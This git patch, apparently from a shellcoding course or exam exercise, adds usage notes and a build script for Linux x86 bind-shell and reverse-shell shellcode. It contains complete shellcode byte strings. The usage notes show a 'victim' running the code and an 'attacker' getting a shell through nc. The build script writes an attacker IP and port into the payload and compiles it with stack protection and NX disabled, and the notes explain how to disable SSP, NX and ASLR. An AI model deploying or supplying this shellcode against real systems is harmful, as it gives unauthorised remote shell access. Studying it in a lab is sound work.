From 95690185f2cc237666ed19ef4b3430f7c352fd4d Mon Sep 17 00:00:00 2001 From: arno01 Date: Wed, 13 Mar 2013 00:06:45 +0100 Subject: [PATCH] minor updates --- exam1/USAGE | 34 ++++++++++ exam2/NOTES | 11 +++ exam2/USAGE | 35 ++++++++++ exam2/compile_all.sh | 158 +++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 238 insertions(+) create mode 100644 exam1/USAGE create mode 100644 exam2/NOTES create mode 100644 exam2/USAGE create mode 100644 exam2/compile_all.sh diff --git a/exam1/USAGE b/exam1/USAGE new file mode 100644 index 0000000..b788fe2 --- /dev/null +++ b/exam1/USAGE @@ -0,0 +1,34 @@ +USAGE + + +1. Compile the shellcode + +$ ./compile_all.sh shell_bind_tcp 50123 + [I] Using custom port: 50123 + [+] Assembling shell_bind_tcp.nasm with NASM ... + [+] Linking shell_bind_tcp.o ... + [+] Generating shellcode with objdump ... + [+] Checking shellcode for NULLs ... + [+] Shellcode size is 141 bytes +"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xc3\xcb" + [+] Generating shellcode.c file with the shell_bind_tcp shellcode ... + [+] Compiling shellcode.c with GCC ... + [+] All done! You can run the shellcode now: +$ ./shellcode + + +1. Run the shellcode on the victim machine + +victim $ ./shellcode +Shellcode Length: 141 + +victim # netstat --inet -apn |grep shellcode +tcp 0 0 0.0.0.0:50123 0.0.0.0:* LISTEN 982/./shellcode + + +2. Attacker can now connect and get the shell + +attacker $ nc localhost 50123 +id +uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 + diff --git a/exam2/NOTES b/exam2/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam2/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam2/USAGE b/exam2/USAGE new file mode 100644 index 0000000..55ea17b --- /dev/null +++ b/exam2/USAGE @@ -0,0 +1,35 @@ +USAGE + +1. attacker has 192.168.1.149 IP and runs nc to listen on 55005 port + +attacker $ nc -vl 55005 +[do not close it] + + +2. Running shellcode a victim server +exam2$ ./compile_all.sh shell_reverse_tcp 192.168.1.149 55005 + [I] Using custom port: 55005 + [+] Assembling shell_reverse_tcp.nasm with NASM ... + [+] Linking shell_reverse_tcp.o ... + [+] Generating shellcode with objdump ... + [+] Checking shellcode for NULLs ... + [+] Shellcode size is 117 bytes +"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x51\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x31\xd2\xff\x37\x66\xff\x77\x04\x4b\x66\x53\x43\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x89\xd8\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\xaa\xff\xff\xff\xc0\xa8\x01\x95\xd6\xdd" + [+] Generating shellcode.c file with the shell_reverse_tcp shellcode ... + [+] Compiling shellcode.c with GCC ... + [+] All done! You can run the shellcode now: +$ ./shellcode + +exam2$ ./shellcode +Shellcode Length: 117 + + +3. Checking now your nc +attacker $ nc -vl 55005 +Connection from 192.168.1.149 port 55005 [tcp/*] accepted +id +uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 + + +Voila ! We've got a shell to a victim server. + diff --git a/exam2/compile_all.sh b/exam2/compile_all.sh new file mode 100644 index 0000000..d811f43 --- /dev/null +++ b/exam2/compile_all.sh @@ -0,0 +1,158 @@ +#!/usr/bin/env sh +# +# Creates a shell_reverse_tcp shellcode +# +# Example +# ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357 +# +# If no IP & Port specified, the default ones will be used 192.168.1.1 12357 +# +# IP and Port are stored in last 6 bytes in HEX +# + +ARG1=$1 # Specify program +ARG2=$2 # Specify IP +ARG3=$3 # Specify port + +# +# Check script usage and file existence +# +if [ -z "$ARG1" ]; then + echo " [I] Please specify program you would like to assemble!" + echo " [I] Usage example: ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357" + exit 1; +elif [ -e "$ARG1" ]; then + if [[ $ARG1 == *nasm* ]]; then + ARG1=$(echo -ne $ARG1 |sed 's/.....$//g'); + echo $ARG1 + fi +elif [ ! -e "$ARG1".nasm ]; then + ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g') + if [ -e "$ARG1_GUESS" ]; then + ARG1=$ARG1_GUESS + else + echo " [E] File "$ARG1" does not exist!" + exit 1; + fi +fi + + +# +# Validate nasm source file +# +if ! $(grep -qi ^global $ARG1.nasm 2>/dev/null); then + echo " [E] The file "$ARG1.nasm" does not appear to be a correct NASM source!" + exit 1; +fi + + +# +# Validate and Convert IP to HEX +# +function valid_ip() +{ + local ip=$1 + local stat=1 + + if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then + OIFS=$IFS + IFS='.' + ip=($ip) + IFS=$OIFS + [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 && \ + ${ip[2]} -le 255 && ${ip[3]} -le 255 ]] + stat=$? + fi + return $stat +} + +if [ -z "$ARG2" ]; then + echo " [E] Please specify IP" + exit 1; +else + if valid_ip $ARG2; then + IPHEX=$(printf '%.2x' ${ARG2//./ } | sed 's/../\\x&/g') + else + echo " [E] IP is not valid!" + exit 1; + fi +fi + + +# +# Port range check +# +if [ -z "$ARG3" ]; then + echo " [I] Default port will be used." + ARG3=12357; +elif ! [[ $ARG3 -ge 1024 && $ARG3 -le 65535 ]]; then + echo " [E] The port must be in range 1024..65535 !" + exit 1; +else + echo " [I] Using custom port: "$ARG3 +fi + + +# +# Assemble and link +# +echo " [+] Assembling "$ARG1".nasm with NASM ..." +nasm -f elf32 -o $ARG1.o $ARG1.nasm && \ +echo " [+] Linking "$ARG1".o ..." && \ +ld -m elf_i386 -o $ARG1 $ARG1.o && \ +echo -e " [+] Generating shellcode with objdump ..." && \ +SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g') + + +# +# Set the custom port (if any was specified) for the shellcode +# +if [ -z "$ARG3" ]; then + FULL_SHELLCODE=$(echo $SHELLCODE) +else + PORT_HEX=$(printf '%.4x' $ARG3 | sed 's/../\\x&/g') + FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........................$//' ; echo ${IPHEX}${PORT_HEX}"\"") +fi + + +# +# Check shellcode for NULLs +# +echo " [+] Checking shellcode for NULLs ..." +if [[ $FULL_SHELLCODE == *00* ]]; then + echo " [E] Your shellcode contains 00 (NULL) ! Most likely you need to change your IP or port." + exit 1 +fi + +echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n" +echo $FULL_SHELLCODE + + +# +# Generate shellcode.c +# +echo " [+] Generating shellcode.c file with the "$ARG1" shellcode ..." +cat > shellcode.c << EOF +#include +#include + +unsigned char code[] = \ +$FULL_SHELLCODE; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} +EOF + + +# +# Compile C code with GCC +# +echo " [+] Compiling shellcode.c with GCC ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +echo -e " [+] All done! You can run the shellcode now: \n$ ./shellcode" +